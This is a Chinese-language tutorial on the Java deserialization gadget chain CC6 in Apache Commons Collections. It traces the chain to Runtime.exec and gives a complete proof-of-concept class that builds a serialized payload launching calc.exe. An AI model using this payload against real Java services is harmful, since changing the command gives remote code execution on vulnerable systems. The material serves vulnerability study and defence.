Java反序列化之CC6链

Gadget chain

java.io.ObjectInputStream.readObject()
java.util.HashMap.readObject()
java.util.HashMap.hash()
org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
org.apache.commons.collections.map.LazyMap.get()  
    /*
    *需要构造TiedMapEntry
    */
    
org.apache.commons.collections.functors.ChainedTransformer.transform()
org.apache.commons.collections.functors.InvokerTransformer.transform()
java.lang.reflect.Method.invoke()
java.lang.Runtime.exec()

HashMap#readObject --> HashMap#hash --> key.hashCode --> TiedMapEntry#getValue

需要将key设置为TiedMapEntry ， 即可调用TiedMapEntry#hashCode ， 从而利用该反序列链。

TiedMapEntry#getValue :

public Object getValue() {
        return this.map.get(this.key);
    }

HashMap#hash

static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    }

InvokerTransformer是实现了Transformer接⼝的⼀个类，这个类可以⽤来执⾏任意⽅法，这也是反序 列化能执⾏任意代码的关键。 在实例化这个InvokerTransformer时，需要传⼊三个参数，第⼀个参数是待执⾏的⽅法名，第⼆个参数 是这个函数的参数列表的参数类型，第三个参数是传给这个函数的参数列表

CC6

POC

public class CommonsCollections6 {
 public static void main(String[] args) throws Exception {
 Transformer[] fakeTransformers = new Transformer[] {new
ConstantTransformer(1)};
 Transformer[] transformers = new Transformer[] {
 new ConstantTransformer(Runtime.class),
 new InvokerTransformer("getMethod", new Class[] {
String.class,
 Class[].class }, new Object[] { "getRuntime",
 new Class[0] }),
 new InvokerTransformer("invoke", new Class[] {
Object.class,
 Object[].class }, new Object[] { null, new
Object[0] }),
 new InvokerTransformer("exec", new Class[] { String.class
},
 new String[] { "calc.exe" }),
 new ConstantTransformer(1),
 };
 Transformer transformerChain = new
ChainedTransformer(fakeTransformers);
 // 不再使⽤原CommonsCollections6中的HashSet，直接使⽤HashMap
      Map innerMap = new HashMap();
 Map outerMap = LazyMap.decorate(innerMap, transformerChain);
 TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");
 Map expMap = new HashMap();
 expMap.put(tme, "valuevalue");
 outerMap.remove("keykey");
 Field f =
ChainedTransformer.class.getDeclaredField("iTransformers");
 f.setAccessible(true);
 f.set(transformerChain, transformers);
 // ==================
 // ⽣成序列化字符串
 ByteArrayOutputStream barr = new ByteArrayOutputStream();
 ObjectOutputStream oos = new ObjectOutputStream(barr);
 oos.writeObject(expMap);
 oos.close();
 // 本地测试触发
 System.out.println(barr);
 ObjectInputStream ois = new ObjectInputStream(new
ByteArrayInputStream(barr.toByteArray()));
 Object o = (Object)ois.readObject();
 }
}

函数调用堆栈如下：